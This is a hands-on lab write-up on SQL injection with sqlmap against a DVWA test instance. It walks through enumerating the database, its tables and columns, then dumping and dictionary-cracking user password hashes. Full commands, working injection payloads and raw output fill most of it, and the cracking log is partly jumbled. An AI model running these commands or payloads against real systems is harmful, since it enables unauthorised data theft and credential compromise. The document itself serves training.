Hands-on Web Penetration Testing: SQLMAP

1. Lab Project Name

Hands-on Web Penetration Testing: SQLMAP

2. Lab Objectives and Requirements

Become familiar with the principles of SQL injection vulnerabilities.

Become familiar with using the SQLMAP tool.

Step 1. Obtain database information: database vulnerabilities, database name, database version, etc.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

Step 2. Obtain the table names of the database

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

Step 3. Obtain the columns of a specified table in the database

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/

Step 4. Obtain usernames and passwords (column names separated directly by commas)

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '
[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['
[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
